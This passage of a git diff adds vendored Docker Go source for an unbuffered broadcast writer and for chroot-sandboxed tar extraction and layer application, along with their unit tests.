+	writers []io.WriteCloser
+}
+
+// Add adds new io.WriteCloser.
+func (w *Unbuffered) Add(writer io.WriteCloser) {
+	w.mu.Lock()
+	w.writers = append(w.writers, writer)
+	w.mu.Unlock()
+}
+
+// Write writes bytes to all writers. Failed writers will be evicted during
+// this call.
+func (w *Unbuffered) Write(p []byte) (n int, err error) {
+	w.mu.Lock()
+	var evict []int
+	for i, sw := range w.writers {
+		if n, err := sw.Write(p); err != nil || n != len(p) {
+			// On error, evict the writer
+			evict = append(evict, i)
+		}
+	}
+	for n, i := range evict {
+		w.writers = append(w.writers[:i-n], w.writers[i-n+1:]...)
+	}
+	w.mu.Unlock()
+	return len(p), nil
+}
+
+// Clean closes and removes all writers. Last non-eol-terminated part of data
+// will be saved.
+func (w *Unbuffered) Clean() error {
+	w.mu.Lock()
+	for _, sw := range w.writers {
+		sw.Close()
+	}
+	w.writers = nil
+	w.mu.Unlock()
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go
new file mode 100644
index 0000000000..9f8e72bc0f
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go
@@ -0,0 +1,162 @@
+package broadcaster
+
+import (
+	"bytes"
+	"errors"
+	"strings"
+
+	"testing"
+)
+
+type dummyWriter struct {
+	buffer      bytes.Buffer
+	failOnWrite bool
+}
+
+func (dw *dummyWriter) Write(p []byte) (n int, err error) {
+	if dw.failOnWrite {
+		return 0, errors.New("Fake fail")
+	}
+	return dw.buffer.Write(p)
+}
+
+func (dw *dummyWriter) String() string {
+	return dw.buffer.String()
+}
+
+func (dw *dummyWriter) Close() error {
+	return nil
+}
+
+func TestUnbuffered(t *testing.T) {
+	writer := new(Unbuffered)
+
+	// Test 1: Both bufferA and bufferB should contain "foo"
+	bufferA := &dummyWriter{}
+	writer.Add(bufferA)
+	bufferB := &dummyWriter{}
+	writer.Add(bufferB)
+	writer.Write([]byte("foo"))
+
+	if bufferA.String() != "foo" {
+		t.Errorf("Buffer contains %v", bufferA.String())
+	}
+
+	if bufferB.String() != "foo" {
+		t.Errorf("Buffer contains %v", bufferB.String())
+	}
+
+	// Test2: bufferA and bufferB should contain "foobar",
+	// while bufferC should only contain "bar"
+	bufferC := &dummyWriter{}
+	writer.Add(bufferC)
+	writer.Write([]byte("bar"))
+
+	if bufferA.String() != "foobar" {
+		t.Errorf("Buffer contains %v", bufferA.String())
+	}
+
+	if bufferB.String() != "foobar" {
+		t.Errorf("Buffer contains %v", bufferB.String())
+	}
+
+	if bufferC.String() != "bar" {
+		t.Errorf("Buffer contains %v", bufferC.String())
+	}
+
+	// Test3: Test eviction on failure
+	bufferA.failOnWrite = true
+	writer.Write([]byte("fail"))
+	if bufferA.String() != "foobar" {
+		t.Errorf("Buffer contains %v", bufferA.String())
+	}
+	if bufferC.String() != "barfail" {
+		t.Errorf("Buffer contains %v", bufferC.String())
+	}
+	// Even though we reset the flag, no more writes should go in there
+	bufferA.failOnWrite = false
+	writer.Write([]byte("test"))
+	if bufferA.String() != "foobar" {
+		t.Errorf("Buffer contains %v", bufferA.String())
+	}
+	if bufferC.String() != "barfailtest" {
+		t.Errorf("Buffer contains %v", bufferC.String())
+	}
+
+	// Test4: Test eviction on multiple simultaneous failures
+	bufferB.failOnWrite = true
+	bufferC.failOnWrite = true
+	bufferD := &dummyWriter{}
+	writer.Add(bufferD)
+	writer.Write([]byte("yo"))
+	writer.Write([]byte("ink"))
+	if strings.Contains(bufferB.String(), "yoink") {
+		t.Errorf("bufferB received write. contents: %q", bufferB)
+	}
+	if strings.Contains(bufferC.String(), "yoink") {
+		t.Errorf("bufferC received write. contents: %q", bufferC)
+	}
+	if g, w := bufferD.String(), "yoink"; g != w {
+		t.Errorf("bufferD = %q, want %q", g, w)
+	}
+
+	writer.Clean()
+}
+
+type devNullCloser int
+
+func (d devNullCloser) Close() error {
+	return nil
+}
+
+func (d devNullCloser) Write(buf []byte) (int, error) {
+	return len(buf), nil
+}
+
+// This test checks for races. It is only useful when run with the race detector.
+func TestRaceUnbuffered(t *testing.T) {
+	writer := new(Unbuffered)
+	c := make(chan bool)
+	go func() {
+		writer.Add(devNullCloser(0))
+		c <- true
+	}()
+	writer.Write([]byte("hello"))
+	<-c
+}
+
+func BenchmarkUnbuffered(b *testing.B) {
+	writer := new(Unbuffered)
+	setUpWriter := func() {
+		for i := 0; i < 100; i++ {
+			writer.Add(devNullCloser(0))
+			writer.Add(devNullCloser(0))
+			writer.Add(devNullCloser(0))
+		}
+	}
+	testLine := "Line that thinks that it is log line from docker"
+	var buf bytes.Buffer
+	for i := 0; i < 100; i++ {
+		buf.Write([]byte(testLine + "\n"))
+	}
+	// line without eol
+	buf.Write([]byte(testLine))
+	testText := buf.Bytes()
+	b.SetBytes(int64(5 * len(testText)))
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		b.StopTimer()
+		setUpWriter()
+		b.StartTimer()
+
+		for j := 0; j < 5; j++ {
+			if _, err := writer.Write(testText); err != nil {
+				b.Fatal(err)
+			}
+		}
+
+		b.StopTimer()
+		writer.Clean()
+		b.StartTimer()
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go
new file mode 100644
index 0000000000..a7814f5b90
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go
@@ -0,0 +1,97 @@
+package chrootarchive
+
+import (
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/idtools"
+)
+
+var chrootArchiver = &archive.Archiver{Untar: Untar}
+
+// Untar reads a stream of bytes from `archive`, parses it as a tar archive,
+// and unpacks it into the directory at `dest`.
+// The archive may be compressed with one of the following algorithms:
+//  identity (uncompressed), gzip, bzip2, xz.
+func Untar(tarArchive io.Reader, dest string, options *archive.TarOptions) error {
+	return untarHandler(tarArchive, dest, options, true)
+}
+
+// UntarUncompressed reads a stream of bytes from `archive`, parses it as a tar archive,
+// and unpacks it into the directory at `dest`.
+// The archive must be an uncompressed stream.
+func UntarUncompressed(tarArchive io.Reader, dest string, options *archive.TarOptions) error {
+	return untarHandler(tarArchive, dest, options, false)
+}
+
+// Handler for teasing out the automatic decompression
+func untarHandler(tarArchive io.Reader, dest string, options *archive.TarOptions, decompress bool) error {
+
+	if tarArchive == nil {
+		return fmt.Errorf("Empty archive")
+	}
+	if options == nil {
+		options = &archive.TarOptions{}
+	}
+	if options.ExcludePatterns == nil {
+		options.ExcludePatterns = []string{}
+	}
+
+	rootUID, rootGID, err := idtools.GetRootUIDGID(options.UIDMaps, options.GIDMaps)
+	if err != nil {
+		return err
+	}
+
+	dest = filepath.Clean(dest)
+	if _, err := os.Stat(dest); os.IsNotExist(err) {
+		if err := idtools.MkdirAllNewAs(dest, 0755, rootUID, rootGID); err != nil {
+			return err
+		}
+	}
+
+	r := ioutil.NopCloser(tarArchive)
+	if decompress {
+		decompressedArchive, err := archive.DecompressStream(tarArchive)
+		if err != nil {
+			return err
+		}
+		defer decompressedArchive.Close()
+		r = decompressedArchive
+	}
+
+	return invokeUnpack(r, dest, options)
+}
+
+// TarUntar is a convenience function which calls Tar and Untar, with the output of one piped into the other.
+// If either Tar or Untar fails, TarUntar aborts and returns the error.
+func TarUntar(src, dst string) error {
+	return chrootArchiver.TarUntar(src, dst)
+}
+
+// CopyWithTar creates a tar archive of filesystem path `src`, and
+// unpacks it at filesystem path `dst`.
+// The archive is streamed directly with fixed buffering and no
+// intermediary disk IO.
+func CopyWithTar(src, dst string) error {
+	return chrootArchiver.CopyWithTar(src, dst)
+}
+
+// CopyFileWithTar emulates the behavior of the 'cp' command-line
+// for a single file. It copies a regular file from path `src` to
+// path `dst`, and preserves all its metadata.
+//
+// If `dst` ends with a trailing slash '/' ('\' on Windows), the final
+// destination path will be `dst/base(src)` or `dst\base(src)`
+func CopyFileWithTar(src, dst string) (err error) {
+	return chrootArchiver.CopyFileWithTar(src, dst)
+}
+
+// UntarPath is a convenience function which looks for an archive
+// at filesystem path `src`, and unpacks it at `dst`.
+func UntarPath(src, dst string) error {
+	return chrootArchiver.UntarPath(src, dst)
+}
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go
new file mode 100644
index 0000000000..d2d7e621f5
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go
@@ -0,0 +1,394 @@
+package chrootarchive
+
+import (
+	"bytes"
+	"fmt"
+	"hash/crc32"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"runtime"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/reexec"
+	"github.com/docker/docker/pkg/system"
+)
+
+func init() {
+	reexec.Init()
+}
+
+func TestChrootTarUntar(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "docker-TestChrootTarUntar")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	src := filepath.Join(tmpdir, "src")
+	if err := system.MkdirAll(src, 0700); err != nil {
+		t.Fatal(err)
+	}
+	if err := ioutil.WriteFile(filepath.Join(src, "toto"), []byte("hello toto"), 0644); err != nil {
+		t.Fatal(err)
+	}
+	if err := ioutil.WriteFile(filepath.Join(src, "lolo"), []byte("hello lolo"), 0644); err != nil {
+		t.Fatal(err)
+	}
+	stream, err := archive.Tar(src, archive.Uncompressed)
+	if err != nil {
+		t.Fatal(err)
+	}
+	dest := filepath.Join(tmpdir, "src")
+	if err := system.MkdirAll(dest, 0700); err != nil {
+		t.Fatal(err)
+	}
+	if err := Untar(stream, dest, &archive.TarOptions{ExcludePatterns: []string{"lolo"}}); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// gh#10426: Verify the fix for having a huge excludes list (like on `docker load` with large # of
+// local images)
+func TestChrootUntarWithHugeExcludesList(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "docker-TestChrootUntarHugeExcludes")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	src := filepath.Join(tmpdir, "src")
+	if err := system.MkdirAll(src, 0700); err != nil {
+		t.Fatal(err)
+	}
+	if err := ioutil.WriteFile(filepath.Join(src, "toto"), []byte("hello toto"), 0644); err != nil {
+		t.Fatal(err)
+	}
+	stream, err := archive.Tar(src, archive.Uncompressed)
+	if err != nil {
+		t.Fatal(err)
+	}
+	dest := filepath.Join(tmpdir, "dest")
+	if err := system.MkdirAll(dest, 0700); err != nil {
+		t.Fatal(err)
+	}
+	options := &archive.TarOptions{}
+	//65534 entries of 64-byte strings ~= 4MB of environment space which should overflow
+	//on most systems when passed via environment or command line arguments
+	excludes := make([]string, 65534, 65534)
+	for i := 0; i < 65534; i++ {
+		excludes[i] = strings.Repeat(string(i), 64)
+	}
+	options.ExcludePatterns = excludes
+	if err := Untar(stream, dest, options); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestChrootUntarEmptyArchive(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "docker-TestChrootUntarEmptyArchive")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	if err := Untar(nil, tmpdir, nil); err == nil {
+		t.Fatal("expected error on empty archive")
+	}
+}
+
+func prepareSourceDirectory(numberOfFiles int, targetPath string, makeSymLinks bool) (int, error) {
+	fileData := []byte("fooo")
+	for n := 0; n < numberOfFiles; n++ {
+		fileName := fmt.Sprintf("file-%d", n)
+		if err := ioutil.WriteFile(filepath.Join(targetPath, fileName), fileData, 0700); err != nil {
+			return 0, err
+		}
+		if makeSymLinks {
+			if err := os.Symlink(filepath.Join(targetPath, fileName), filepath.Join(targetPath, fileName+"-link")); err != nil {
+				return 0, err
+			}
+		}
+	}
+	totalSize := numberOfFiles * len(fileData)
+	return totalSize, nil
+}
+
+func getHash(filename string) (uint32, error) {
+	stream, err := ioutil.ReadFile(filename)
+	if err != nil {
+		return 0, err
+	}
+	hash := crc32.NewIEEE()
+	hash.Write(stream)
+	return hash.Sum32(), nil
+}
+
+func compareDirectories(src string, dest string) error {
+	changes, err := archive.ChangesDirs(dest, src)
+	if err != nil {
+		return err
+	}
+	if len(changes) > 0 {
+		return fmt.Errorf("Unexpected differences after untar: %v", changes)
+	}
+	return nil
+}
+
+func compareFiles(src string, dest string) error {
+	srcHash, err := getHash(src)
+	if err != nil {
+		return err
+	}
+	destHash, err := getHash(dest)
+	if err != nil {
+		return err
+	}
+	if srcHash != destHash {
+		return fmt.Errorf("%s is different from %s", src, dest)
+	}
+	return nil
+}
+
+func TestChrootTarUntarWithSymlink(t *testing.T) {
+	// TODO Windows: Figure out why this is failing
+	if runtime.GOOS == "windows" {
+		t.Skip("Failing on Windows")
+	}
+	tmpdir, err := ioutil.TempDir("", "docker-TestChrootTarUntarWithSymlink")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	src := filepath.Join(tmpdir, "src")
+	if err := system.MkdirAll(src, 0700); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := prepareSourceDirectory(10, src, false); err != nil {
+		t.Fatal(err)
+	}
+	dest := filepath.Join(tmpdir, "dest")
+	if err := TarUntar(src, dest); err != nil {
+		t.Fatal(err)
+	}
+	if err := compareDirectories(src, dest); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestChrootCopyWithTar(t *testing.T) {
+	// TODO Windows: Figure out why this is failing
+	if runtime.GOOS == "windows" || runtime.GOOS == "solaris" {
+		t.Skip("Failing on Windows and Solaris")
+	}
+	tmpdir, err := ioutil.TempDir("", "docker-TestChrootCopyWithTar")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	src := filepath.Join(tmpdir, "src")
+	if err := system.MkdirAll(src, 0700); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := prepareSourceDirectory(10, src, true); err != nil {
+		t.Fatal(err)
+	}
+
+	// Copy directory
+	dest := filepath.Join(tmpdir, "dest")
+	if err := CopyWithTar(src, dest); err != nil {
+		t.Fatal(err)
+	}
+	if err := compareDirectories(src, dest); err != nil {
+		t.Fatal(err)
+	}
+
+	// Copy file
+	srcfile := filepath.Join(src, "file-1")
+	dest = filepath.Join(tmpdir, "destFile")
+	destfile := filepath.Join(dest, "file-1")
+	if err := CopyWithTar(srcfile, destfile); err != nil {
+		t.Fatal(err)
+	}
+	if err := compareFiles(srcfile, destfile); err != nil {
+		t.Fatal(err)
+	}
+
+	// Copy symbolic link
+	srcLinkfile := filepath.Join(src, "file-1-link")
+	dest = filepath.Join(tmpdir, "destSymlink")
+	destLinkfile := filepath.Join(dest, "file-1-link")
+	if err := CopyWithTar(srcLinkfile, destLinkfile); err != nil {
+		t.Fatal(err)
+	}
+	if err := compareFiles(srcLinkfile, destLinkfile); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestChrootCopyFileWithTar(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "docker-TestChrootCopyFileWithTar")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	src := filepath.Join(tmpdir, "src")
+	if err := system.MkdirAll(src, 0700); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := prepareSourceDirectory(10, src, true); err != nil {
+		t.Fatal(err)
+	}
+
+	// Copy directory
+	dest := filepath.Join(tmpdir, "dest")
+	if err := CopyFileWithTar(src, dest); err == nil {
+		t.Fatal("Expected error on copying directory")
+	}
+
+	// Copy file
+	srcfile := filepath.Join(src, "file-1")
+	dest = filepath.Join(tmpdir, "destFile")
+	destfile := filepath.Join(dest, "file-1")
+	if err := CopyFileWithTar(srcfile, destfile); err != nil {
+		t.Fatal(err)
+	}
+	if err := compareFiles(srcfile, destfile); err != nil {
+		t.Fatal(err)
+	}
+
+	// Copy symbolic link
+	srcLinkfile := filepath.Join(src, "file-1-link")
+	dest = filepath.Join(tmpdir, "destSymlink")
+	destLinkfile := filepath.Join(dest, "file-1-link")
+	if err := CopyFileWithTar(srcLinkfile, destLinkfile); err != nil {
+		t.Fatal(err)
+	}
+	if err := compareFiles(srcLinkfile, destLinkfile); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestChrootUntarPath(t *testing.T) {
+	// TODO Windows: Figure out why this is failing
+	if runtime.GOOS == "windows" {
+		t.Skip("Failing on Windows")
+	}
+	tmpdir, err := ioutil.TempDir("", "docker-TestChrootUntarPath")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	src := filepath.Join(tmpdir, "src")
+	if err := system.MkdirAll(src, 0700); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := prepareSourceDirectory(10, src, false); err != nil {
+		t.Fatal(err)
+	}
+	dest := filepath.Join(tmpdir, "dest")
+	// Untar a directory
+	if err := UntarPath(src, dest); err == nil {
+		t.Fatal("Expected error on untaring a directory")
+	}
+
+	// Untar a tar file
+	stream, err := archive.Tar(src, archive.Uncompressed)
+	if err != nil {
+		t.Fatal(err)
+	}
+	buf := new(bytes.Buffer)
+	buf.ReadFrom(stream)
+	tarfile := filepath.Join(tmpdir, "src.tar")
+	if err := ioutil.WriteFile(tarfile, buf.Bytes(), 0644); err != nil {
+		t.Fatal(err)
+	}
+	if err := UntarPath(tarfile, dest); err != nil {
+		t.Fatal(err)
+	}
+	if err := compareDirectories(src, dest); err != nil {
+		t.Fatal(err)
+	}
+}
+
+type slowEmptyTarReader struct {
+	size      int
+	offset    int
+	chunkSize int
+}
+
+// Read is a slow reader of an empty tar (like the output of "tar c --files-from /dev/null")
+func (s *slowEmptyTarReader) Read(p []byte) (int, error) {
+	time.Sleep(100 * time.Millisecond)
+	count := s.chunkSize
+	if len(p) < s.chunkSize {
+		count = len(p)
+	}
+	for i := 0; i < count; i++ {
+		p[i] = 0
+	}
+	s.offset += count
+	if s.offset > s.size {
+		return count, io.EOF
+	}
+	return count, nil
+}
+
+func TestChrootUntarEmptyArchiveFromSlowReader(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "docker-TestChrootUntarEmptyArchiveFromSlowReader")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	dest := filepath.Join(tmpdir, "dest")
+	if err := system.MkdirAll(dest, 0700); err != nil {
+		t.Fatal(err)
+	}
+	stream := &slowEmptyTarReader{size: 10240, chunkSize: 1024}
+	if err := Untar(stream, dest, nil); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestChrootApplyEmptyArchiveFromSlowReader(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "docker-TestChrootApplyEmptyArchiveFromSlowReader")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	dest := filepath.Join(tmpdir, "dest")
+	if err := system.MkdirAll(dest, 0700); err != nil {
+		t.Fatal(err)
+	}
+	stream := &slowEmptyTarReader{size: 10240, chunkSize: 1024}
+	if _, err := ApplyLayer(dest, stream); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestChrootApplyDotDotFile(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "docker-TestChrootApplyDotDotFile")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	src := filepath.Join(tmpdir, "src")
+	if err := system.MkdirAll(src, 0700); err != nil {
+		t.Fatal(err)
+	}
+	if err := ioutil.WriteFile(filepath.Join(src, "..gitme"), []byte(""), 0644); err != nil {
+		t.Fatal(err)
+	}
+	stream, err := archive.Tar(src, archive.Uncompressed)
+	if err != nil {
+		t.Fatal(err)
+	}
+	dest := filepath.Join(tmpdir, "dest")
+	if err := system.MkdirAll(dest, 0700); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := ApplyLayer(dest, stream); err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go
new file mode 100644
index 0000000000..f2325abd74
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go
@@ -0,0 +1,86 @@
+// +build !windows
+
+package chrootarchive
+
+import (
+	"bytes"
+	"encoding/json"
+	"flag"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"runtime"
+
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/reexec"
+)
+
+// untar is the entry-point for docker-untar on re-exec. This is not used on
+// Windows as it does not support chroot, hence no point sandboxing through
+// chroot and rexec.
+func untar() {
+	runtime.LockOSThread()
+	flag.Parse()
+
+	var options *archive.TarOptions
+
+	//read the options from the pipe "ExtraFiles"
+	if err := json.NewDecoder(os.NewFile(3, "options")).Decode(&options); err != nil {
+		fatal(err)
+	}
+
+	if err := chroot(flag.Arg(0)); err != nil {
+		fatal(err)
+	}
+
+	if err := archive.Unpack(os.Stdin, "/", options); err != nil {
+		fatal(err)
+	}
+	// fully consume stdin in case it is zero padded
+	if _, err := flush(os.Stdin); err != nil {
+		fatal(err)
+	}
+
+	os.Exit(0)
+}
+
+func invokeUnpack(decompressedArchive io.Reader, dest string, options *archive.TarOptions) error {
+
+	// We can't pass a potentially large exclude list directly via cmd line
+	// because we easily overrun the kernel's max argument/environment size
+	// when the full image list is passed (e.g. when this is used by
+	// `docker load`). We will marshall the options via a pipe to the
+	// child
+	r, w, err := os.Pipe()
+	if err != nil {
+		return fmt.Errorf("Untar pipe failure: %v", err)
+	}
+
+	cmd := reexec.Command("docker-untar", dest)
+	cmd.Stdin = decompressedArchive
+
+	cmd.ExtraFiles = append(cmd.ExtraFiles, r)
+	output := bytes.NewBuffer(nil)
+	cmd.Stdout = output
+	cmd.Stderr = output
+
+	if err := cmd.Start(); err != nil {
+		return fmt.Errorf("Untar error on re-exec cmd: %v", err)
+	}
+	//write the options to the pipe for the untar exec to read
+	if err := json.NewEncoder(w).Encode(options); err != nil {
+		return fmt.Errorf("Untar json encode to pipe failed: %v", err)
+	}
+	w.Close()
+
+	if err := cmd.Wait(); err != nil {
+		// when `xz -d -c -q | docker-untar ...` failed on docker-untar side,
+		// we need to exhaust `xz`'s output, otherwise the `xz` side will be
+		// pending on write pipe forever
+		io.Copy(ioutil.Discard, decompressedArchive)
+
+		return fmt.Errorf("Error processing tar file(%v): %s", err, output)
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go
new file mode 100644
index 0000000000..0a500ed5c2
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go
@@ -0,0 +1,22 @@
+package chrootarchive
+
+import (
+	"io"
+
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/longpath"
+)
+
+// chroot is not supported by Windows
+func chroot(path string) error {
+	return nil
+}
+
+func invokeUnpack(decompressedArchive io.ReadCloser,
+	dest string,
+	options *archive.TarOptions) error {
+	// Windows is different to Linux here because Windows does not support
+	// chroot. Hence there is no point sandboxing a chrooted process to
+	// do the unpack. We call inline instead within the daemon process.
+	return archive.Unpack(decompressedArchive, longpath.AddPrefix(dest), options)
+}
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go
new file mode 100644
index 0000000000..f9d7fed633
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go
@@ -0,0 +1,108 @@
+package chrootarchive
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"syscall"
+
+	"github.com/docker/docker/pkg/mount"
+	rsystem "github.com/opencontainers/runc/libcontainer/system"
+)
+
+// chroot on linux uses pivot_root instead of chroot
+// pivot_root takes a new root and an old root.
+// Old root must be a sub-dir of new root, it is where the current rootfs will reside after the call to pivot_root.
+// New root is where the new rootfs is set to.
+// Old root is removed after the call to pivot_root so it is no longer available under the new root.
+// This is similar to how libcontainer sets up a container's rootfs
+func chroot(path string) (err error) {
+	// if the engine is running in a user namespace we need to use actual chroot
+	if rsystem.RunningInUserNS() {
+		return realChroot(path)
+	}
+	if err := syscall.Unshare(syscall.CLONE_NEWNS); err != nil {
+		return fmt.Errorf("Error creating mount namespace before pivot: %v", err)
+	}
+
+	// make everything in new ns private
+	if err := mount.MakeRPrivate("/"); err != nil {
+		return err
+	}
+
+	if mounted, _ := mount.Mounted(path); !mounted {
+		if err := mount.Mount(path, path, "bind", "rbind,rw"); err != nil {
+			return realChroot(path)
+		}
+	}
+
+	// setup oldRoot for pivot_root
+	pivotDir, err := ioutil.TempDir(path, ".pivot_root")
+	if err != nil {
+		return fmt.Errorf("Error setting up pivot dir: %v", err)
+	}
+
+	var mounted bool
+	defer func() {
+		if mounted {
+			// make sure pivotDir is not mounted before we try to remove it
+			if errCleanup := syscall.Unmount(pivotDir, syscall.MNT_DETACH); errCleanup != nil {
+				if err == nil {
+					err = errCleanup
+				}
+				return
+			}
+		}
+
+		errCleanup := os.Remove(pivotDir)
+		// pivotDir doesn't exist if pivot_root failed and chroot+chdir was successful
+		// because we already cleaned it up on failed pivot_root
+		if errCleanup != nil && !os.IsNotExist(errCleanup) {
+			errCleanup = fmt.Errorf("Error cleaning up after pivot: %v", errCleanup)
+			if err == nil {
+				err = errCleanup
+			}
+		}
+	}()
+
+	if err := syscall.PivotRoot(path, pivotDir); err != nil {
+		// If pivot fails, fall back to the normal chroot after cleaning up temp dir
+		if err := os.Remove(pivotDir); err != nil {
+			return fmt.Errorf("Error cleaning up after failed pivot: %v", err)
+		}
+		return realChroot(path)
+	}
+	mounted = true
+
+	// This is the new path for where the old root (prior to the pivot) has been moved to
+	// This dir contains the rootfs of the caller, which we need to remove so it is not visible during extraction
+	pivotDir = filepath.Join("/", filepath.Base(pivotDir))
+
+	if err := syscall.Chdir("/"); err != nil {
+		return fmt.Errorf("Error changing to new root: %v", err)
+	}
+
+	// Make the pivotDir (where the old root lives) private so it can be unmounted without propagating to the host
+	if err := syscall.Mount("", pivotDir, "", syscall.MS_PRIVATE|syscall.MS_REC, ""); err != nil {
+		return fmt.Errorf("Error making old root private after pivot: %v", err)
+	}
+
+	// Now unmount the old root so it's no longer visible from the new root
+	if err := syscall.Unmount(pivotDir, syscall.MNT_DETACH); err != nil {
+		return fmt.Errorf("Error while unmounting old root after pivot: %v", err)
+	}
+	mounted = false
+
+	return nil
+}
+
+func realChroot(path string) error {
+	if err := syscall.Chroot(path); err != nil {
+		return fmt.Errorf("Error after fallback to chroot: %v", err)
+	}
+	if err := syscall.Chdir("/"); err != nil {
+		return fmt.Errorf("Error changing to new root after chroot: %v", err)
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go
new file mode 100644
index 0000000000..16354bf648
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go
@@ -0,0 +1,12 @@
+// +build !windows,!linux
+
+package chrootarchive
+
+import "syscall"
+
+func chroot(path string) error {
+	if err := syscall.Chroot(path); err != nil {
+		return err
+	}
+	return syscall.Chdir("/")
+}
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go b/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go
new file mode 100644
index 0000000000..49acad79ff
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go
@@ -0,0 +1,23 @@
+package chrootarchive
+
+import (
+	"io"
+
+	"github.com/docker/docker/pkg/archive"
+)
+
+// ApplyLayer parses a diff in the standard layer format from `layer`,
+// and applies it to the directory `dest`. The stream `layer` can only be
+// uncompressed.
+// Returns the size in bytes of the contents of the layer.
+func ApplyLayer(dest string, layer io.Reader) (size int64, err error) {
+	return applyLayerHandler(dest, layer, &archive.TarOptions{}, true)
+}
+
+// ApplyUncompressedLayer parses a diff in the standard layer format from
+// `layer`, and applies it to the directory `dest`. The stream `layer`
+// can only be uncompressed.
+// Returns the size in bytes of the contents of the layer.
+func ApplyUncompressedLayer(dest string, layer io.Reader, options *archive.TarOptions) (int64, error) {
+	return applyLayerHandler(dest, layer, options, false)
+}
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go
new file mode 100644
index 0000000000..eb0aacc3ab
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go
@@ -0,0 +1,130 @@
+//+build !windows
+
+package chrootarchive
+
+import (
+	"bytes"
+	"encoding/json"
+	"flag"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"runtime"
+
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/reexec"
+	"github.com/docker/docker/pkg/system"
+	rsystem "github.com/opencontainers/runc/libcontainer/system"
+)
+
+type applyLayerResponse struct {
+	LayerSize int64 `json:"layerSize"`
+}
+
+// applyLayer is the entry-point for docker-applylayer on re-exec. This is not
+// used on Windows as it does not support chroot, hence no point sandboxing
+// through chroot and rexec.
+func applyLayer() {
+
+	var (
+		tmpDir  = ""
+		err     error
+		options *archive.TarOptions
+	)
+	runtime.LockOSThread()
+	flag.Parse()
+
+	inUserns := rsystem.RunningInUserNS()
+	if err := chroot(flag.Arg(0)); err != nil {
